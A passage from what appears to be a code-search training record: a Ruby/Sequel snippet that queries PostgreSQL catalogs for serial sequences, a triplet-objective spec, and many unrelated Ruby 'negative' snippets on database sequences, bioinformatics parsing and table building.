name[:nspname].as(:schema),
seq[:relname].as(:sequence)
]}
end
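
A minimal usage sketch (not part of the snippet above): the generic dataset can be narrowed to one table/column pair to resolve its backing serial sequence. The serial_sequence_for wrapper is hypothetical; regclass_oid is assumed available in the adapter, as in the convert_serial_to_identity snippet elsewhere in this record's negatives.

def serial_sequence_for(table, column)
  oid = regclass_oid(table) # assumed helper returning the table's pg_class OID
  _select_serial_sequence_ds.
    where{[[t[:oid], oid], [attr[:attname], column.to_s]]}.
    first # => e.g. {:schema=>"public", :sequence=>"items_id_seq"}
end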
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _select_custom_sequence_ds\n @_select_custom_sequence_ds ||= metadata_dataset.\n from{pg_class.as(:t)}.\n join(:pg_namespace, {:oid => :relnamespace}, :table_alias=>:name).\n join(:pg_attribute, {:attrelid => Sequel[:t][:oid]}, :table_alias=>:attr).\n join(:pg_attrdef, {:adrelid => :attrelid, :adnum => :attnum}, :table_alias=>:def).\n join(:pg_constraint, {:conrelid => :adrelid, Sequel[:cons][:conkey].sql_subscript(1) => :adnum}, :table_alias=>:cons).\n where{{cons[:contype] => 'p', pg_get_expr(self.def[:adbin], attr[:attrelid]) => /nextval/i}}.\n select{\n expr = split_part(pg_get_expr(self.def[:adbin], attr[:attrelid]), \"'\", 2)\n [\n name[:nspname].as(:schema),\n Sequel.case({{expr => /./} => substr(expr, strpos(expr, '.')+1)}, expr).as(:sequence)\n ]\n }\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def sequence_number; end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def qseq; @mrna.seq; end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def titulares_serial\n Representante.find(self.titular_ids_serial).map(&:nombre)\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def sequence\n @sequence\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def make_tnt_input(seq_arr)\n seq_arr_length = seq_arr[0][:seq].length()\n retstr = \"xread\\n#{seq_arr_length} 49\\n\"\n seq_arr.each { |sa| retstr << \"#{sa[:genus]} #{sa[:seq]}\\n\" }\n retstr << \";\\n\"\nend",
"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
"def data(opts = {})\n sources = self.attributes[:sources] || []\n seq_opts = {:kind => self.attributes[:kind].to_sym}.merge(opts)\n sequence = SequenceQuery.new(sources, seq_opts)\n seqs = sequence.sequences\n seqs.map do |seq|\n {\n :data => seq[1],\n :start_time => sequence.start_time_epoch,\n :source => seq[0]\n }\n end\n end",
"def generate_aasequences\n (0..self.sequence.length-1).each do |i|\n AAsequence.create(:seq_id=> self.seq_id,\n :amino_acid=>self.sequence[i],\n :original_position=>i)\n end\n end",
"def predict_format_converter usages\r\n @date = []\r\n @total = []\r\n @lines = []\r\n @labels = []\r\n @table_array = []\r\n usages[:daily_usage].each do |usage|\r\n @date.append(usage[:date].to_s)\r\n\r\n @total.append(usage[:usage])\r\n end\r\n @table_array.append(\"date[i]\")\r\n @table_array.append(\"total[i]\")\r\n usages[:daily_time_periods].each_with_index do |period, index|\r\n @name =\"lines[#{index.to_s}][i]\"\r\n @table_array.append(@name)\r\n @lines.append([])\r\n @labels.append(period[:label])\r\n period[:daily_usage].each do |usage|\r\n @lines[index].append(usage[:usage])\r\n\r\n end\r\n end\r\n end",
"def table_array\r\n @table_array\r\n end",
"def hseq; @seq2.seq; end",
"def prepare_sequence(sequence)\n nv = remove_non_amino_acids(sequence)\n split_sequence(nv)\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def getFtsNtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def qseq; @seq1.seq; end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def getFtsProtSequences\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if ftH.has_key? \"pseudo\"\n next\n end\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n dna = getDna(ft,@gbkObj.to_biosequence)\n pep = ftH[\"translation\"][0] if !ftH[\"translation\"].nil?\n pepBioSeq = Bio::Sequence.auto(pep)\n seqout = pepBioSeq.output_fasta(\"#{@accession}|#{loc}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end",
"def sequence\n return @sequence\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def table \n table = data.map do |slot|\n slot.position.to_s.ljust(12) + slot.license_plate.ljust(19) + slot.color + \"\\n\" if slot\n end.join('')\n end",
"def data\n data = (@transpose ? @data.transpose : @data).clone\n data.shift\n data\n end",
"def seq\n Sequence::NA.new( fetch('').gsub(/ /,'').gsub(/\\d+/,'') )\n end",
"def generate_sequence(comparison)\n identifier = []\n identifier << {\n \"system\" => \"https://precision.fda.gov/fhir/Sequence/\",\n \"value\" => comparison.uid,\n }\n\n coding = []\n %w(ref_vcf ref_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n coding << {\n \"system\" => \"https://precision.fda.gov/files\",\n \"code\" => input.user_file.dxid,\n \"display\" => input.user_file.public? ? input.user_file.name : input.user_file.dxid,\n }\n end\n\n standard_sequence = { \"coding\" => coding }\n\n app = App.find_by(dxid: COMPARATOR_V1_APP_ID)\n coding = []\n\n if app\n coding << {\n \"system\" => \"https://precision.fda.gov/apps\",\n \"code\" => app.dxid,\n \"display\" => app.title,\n \"version\" => app.revision.to_s,\n }\n end\n\n method = {\n \"coding\" => coding,\n }\n\n quality_data = {\n \"type\" => \"unknown\",\n \"standardSequence\" => standard_sequence,\n \"method\" => method,\n \"truthTP\" => comparison.meta[\"true-pos\"].to_i,\n \"truthFN\" => comparison.meta[\"false-neg\"].to_i,\n \"queryFP\" => comparison.meta[\"false-pos\"].to_i,\n \"precision\" => comparison.meta[\"precision\"].to_f,\n \"recall\" => comparison.meta[\"recall\"].to_f,\n \"fMeasure\" => comparison.meta[\"f-measure\"].to_f,\n }\n\n # For ROC data points, convert them to floats before exporting\n meta_roc = comparison.meta[\"weighted_roc\"]\n\n headers_map = {\n \"score\" => \"score\",\n \"true_positives\" => \"numTP\",\n \"false_positives\" => \"numFP\",\n \"false_negatives\" => \"numFN\",\n \"precision\" => \"precision\",\n \"sensitivity\" => \"sensitivity\",\n \"f_measure\" => \"fMeasure\",\n }\n\n if meta_roc[\"data\"].present?\n headers = {}\n\n meta_roc[\"header\"].map.each_with_index do |h, i|\n new_key = headers_map[h]\n\n case h\n when \"score\", \"true_positives\", \"false_positives\", \"false_negatives\"\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_i }\n else\n headers[new_key] = meta_roc[\"data\"].map { |d| d[i].to_f }\n end\n end\n\n quality_data[\"roc\"] = headers\n end\n\n quality = []\n quality << quality_data\n repository = []\n\n %w(test_vcf test_bed).each do |role|\n input = comparison.input(role)\n next if input.blank?\n\n repository << {\n \"type\" => \"login\",\n \"url\" => \"https://precision.fda.gov#{pathify(input.user_file)}\",\n \"name\" => \"PrecisionFDA\",\n \"variantsetId\" => input.user_file.dxid,\n }\n end\n\n {\n \"resourceType\" => \"Sequence\",\n \"type\" => \"dna\",\n \"coordinateSystem\" => 1,\n \"identifier\" => identifier,\n \"quality\" => quality,\n \"repository\" => repository,\n }\n end",
"def sample_data\n %w(A,B,1 A,C,2 B,C,3 B,D,3 C,D,1 B,E,2 D,F,3 D,E,3 E,G,3 F,G,1)\n end",
"def serial_adj\n serial_word\n end",
"def list_sequences(starts_with)\n self.select_rows(\"SHOW TABLES LIKE '#{starts_with}%_sequence'\").map { |result| result.first.gsub('_sequence', '') }\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def sequence\n if !sequence?\n raise NotImplementedException, \"Attempted to get the sequence of a velvet node that is too short, such that the sequence info is not fully present in the node object\"\n end\n kmer_length = @parent_graph.hash_length\n\n # Sequence is the reverse complement of the ends_of_kmers_of_twin_node,\n # Then the ends_of_kmers_of_node after removing the first kmer_length - 1\n # nucleotides\n length_to_get_from_fwd = corresponding_contig_length - @ends_of_kmers_of_twin_node.length\n fwd_length = @ends_of_kmers_of_node.length\n raise \"Programming error\" if length_to_get_from_fwd > fwd_length\n revcom(@ends_of_kmers_of_twin_node)+\n @ends_of_kmers_of_node[-length_to_get_from_fwd...fwd_length]\n end",
"def sequence\n return self.dna.sequence\n end",
"def create_column_data_array\n\ttable_id = create_table_id('../data/census_column_metadata.csv')\n\tcolumn_id = create_column_id('../data/census_column_metadata.csv')\n\t\n\t[title_processor,table_id,column_id].transpose\n\nend",
"def table_data\n @building_groups.reduce([]) do |table, bg|\n table << energy_row(bg)\n end\n end",
"def sequence_separator; end",
"def convert_serial_to_identity(table, opts=OPTS)\n raise Error, \"convert_serial_to_identity is only supported on PostgreSQL 10.2+\" unless server_version >= 100002\n\n server = opts[:server]\n server_hash = server ? {:server=>server} : OPTS\n ds = dataset\n ds = ds.server(server) if server\n\n raise Error, \"convert_serial_to_identity requires superuser permissions\" unless ds.get{current_setting('is_superuser')} == 'on'\n\n table_oid = regclass_oid(table)\n im = input_identifier_meth\n unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))\n raise Error, \"could not determine column to convert from serial to identity automatically\"\n end\n column = im.call(column)\n\n column_num = ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n get(:attnum)\n\n pg_class = Sequel.cast('pg_class', :regclass)\n res = ds.from(:pg_depend).\n where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').\n select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])\n\n case res.length\n when 0\n raise Error, \"unable to find related sequence when converting serial to identity\"\n when 1\n seq_oid, already_identity = res.first\n else\n raise Error, \"more than one linked sequence found when converting serial to identity\"\n end\n\n return if already_identity\n\n transaction(server_hash) do\n run(\"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT\", server_hash)\n\n ds.from(:pg_depend).\n where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').\n update(:deptype=>'i')\n\n ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n update(:attidentity=>'d')\n end\n\n remove_cached_schema(table)\n nil\n end",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def dataset\n @dataset ||= generate_dataset\n end",
"def seq\n if @seq.nil?\n @seq = ''\n self.exons.each do |exon|\n @seq += exon.seq\n end\n end\n return @seq\n end",
"def serial_no\n [doc_series, doc_no].join(' ')\n end",
"def to_s(tab,table)\r\n\t\ts = \"\"\r\n\t\tif @instrucciones != nil\r\n\t\t\ts << @instrucciones.to_s(tab,table) + (\" \"*(tab))+\"Sequencing\\n\" + @instruccion.to_s(tab+1,table)\r\n\t\t\r\n\t\telse\r\n\t\t\ts << @instruccion.to_s(tab,table)\r\n\t\tend\r\n\r\n\t\treturn s\r\n\tend",
"def sequences(name = nil)\n query(PostgreSQLExtensions::Utils.strip_heredoc(<<-SQL), name).map { |row| row[0] }\n SELECT c.relname AS sequencename\n FROM pg_class c\n WHERE c.relkind = 'S'::\"char\";\n SQL\n end",
"def seq\n @values.fetch('seq') { \n @values['seq'] = nil\n }\n end",
"def dataset\n database[table_name]\n end",
"def five_prime_utr_seq\n return self.seq[0, self.coding_region_cdna_start - 1]\n end",
"def ll_table\n\t\ttable = {}\n\t\tnon_terminals.each do |non_term|\n\t\t\ttable[non_term] = {}\n\t\t\tp_sets = predict_sets(non_term)\n\t\t\tp_sets.each_index do |i|\n\t\t\t\tp_sets[i].each do |term|\n\t\t\t\t\ttable[non_term][term] = i\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\treturn table\n\tend",
"def cds_seq\n cds_length = self.coding_region_cdna_end - self.coding_region_cdna_start + 1\n \n return self.seq[(self.coding_region_cdna_start - 1), cds_length]\n end",
"def prepare_dataset\n @working_dataset.dataset.each { |tuple| @clustered_dataset[tuple] = -1 }\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def start; @sequence[0]; end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def remove_inserts\n\n currseq = \"\"\n currname = \"\"\n # TODO: extract this from all methods to a helper class \n @content.each do |line|\n # if name anchor is found start a new bin\n if (line =~ /^>(.*)/)\n # check if we found next bin\n if (currseq.length > 0)\n # push name and sequence to containers\n @names << currname\n @seqs << currseq\n end\n # name is found next to anchor\n currname = $1\n # no sequence data yet\n currseq = \"\"\n else\n # append sequence data\n currseq += line\n end \n end \n # collect the data from the last bin\n if (currseq.length > 0)\n @names << currname\n @seqs << currseq\n end\n \n match_cols = []\n \n # Determine which columns have a gap in first sequence (match_cols = false)\n residues = @seqs[0].unpack(\"C*\")\n residues.each_index do |num|\n if (residues[num] == 45 || residues[num] == 46)\n match_cols[num] = false\n else\n match_cols[num] = true\n end\n end\n \n # Delete insert columns\n @names.each_index do |i|\n # Unpack C : 8-bit unsigned integer , push -> Array\n residues = @seqs[i].unpack(\"C*\")\n seq = \"\"\n # traverse over Integer Representation\n residues.each_index do |num|\n # If the base Sequence has no gap then check current sequence \n if (match_cols[num])\n if (residues[num] == 45 || residues[num] == 46)\n # Add gap to Sequence\n seq += \"-\"\n else\n # Add the Residue to Sequence\n seq += residues[num].chr\n end \n end \n end\n # Remove anchoring String Characters\n seq.tr!('^a-zA-Z-','')\n # Push an Upper Case representation to the @seqs array\n @seqs[i] = seq.upcase\n # Check whether all sequences have same length as parent\n if (@seqs[i].length != @seqs[0].length)\n logger.debug \"ERROR! Sequences in alignment do not all have equal length!\"\n end\n end\n end",
"def initialize(primary_key, uuid, uti, note)\n # Set this objects's variables\n super(primary_key, uuid, uti, note)\n\n # This will hold our reconstructed table\n @reconstructed_table = Array.new\n\n # These variables hold different parts of the protobuf\n @row_items = Array.new\n @table_objects = Array.new\n @uuid_items = Array.new\n @type_items = Array.new\n\n @total_rows = 0\n @total_columns = 0\n\n # This will hold a mapping of UUID index number to row Array index in @reconstructed_table\n @row_indices = Hash.new\n\n # This will hold a mapping of UUID index number to column Array index in @reconstructed_table\n @column_indices = Hash.new\n\n # This will hold the table's direction, it defaults to left-to-right, will be changed during rebuild_table if needed\n @table_direction = LEFT_TO_RIGHT_DIRECTION\n rebuild_table\n end",
"def calculate_deps\n SequenceDependency\n .where(ALL_SEQ_DEPS, device.id)\n .where(dependency_type: \"Point\")\n .where(dependency_id: points.pluck(:id))\n .map(&:sequence)\n end",
"def seq\n return self.slice.seq\n end",
"def hseq; @genomic.seq; end",
"def protein_seq\n return Bio::Sequence::NA.new(self.cds_seq).translate.seq\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
